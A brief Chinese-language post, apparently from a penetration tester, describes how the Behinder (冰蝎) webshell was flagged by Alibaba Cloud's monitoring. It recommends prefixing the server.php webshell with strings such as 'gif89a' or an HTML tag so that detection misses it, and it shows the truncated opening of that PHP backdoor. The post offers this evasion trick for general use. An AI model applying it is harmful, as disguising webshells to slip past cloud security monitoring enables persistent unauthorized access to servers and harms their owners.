最近在渗透测试阿里云服务器的时候,发现冰蝎被阿里云报webshell事件,和冰蝎的作者rebeyond是多年的老朋友了,交流了一下,在server.php服务端文件里面加入一些混淆字符就可以绕过监控了,大家自由发挥:如<html lang="en"> 或gif89a等宽字符
gif89a <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])).....